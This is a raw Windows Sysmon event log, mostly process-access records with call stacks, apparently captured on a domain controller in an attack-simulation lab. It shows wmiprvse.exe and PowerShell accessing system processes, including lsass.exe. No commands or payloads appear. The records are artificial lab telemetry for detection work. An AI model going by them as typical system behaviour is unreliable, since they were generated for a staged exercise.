15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.038{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025016Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.960{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025015Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.960{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025014Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.929{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025013Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.929{7901BC46-4985-6008-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000025012Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.882{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_14f4t4lx.lui.ps12021-01-20 15:59:27.882 10341000x800000000000000025011Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.866{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025010Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.835{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5506-00000000A301}3288C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025009Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.835{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-535F-6008-5506-00000000A301}3288C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025008Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.819{7901BC46-535F-6008-5506-00000000A301}32882284C:\Windows\system32\conhost.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025007Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.819{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535F-6008-5506-00000000A301}3288C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025006Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.819{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025005Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.819{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025004Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.819{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025003Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.819{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025002Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:27.819{7901BC46-4A88-6008-F200-00000000A301}19124816C:\Windows\system32\csrss.exe{7901BC46-535F-6008-5406-00000000A301}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025001Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 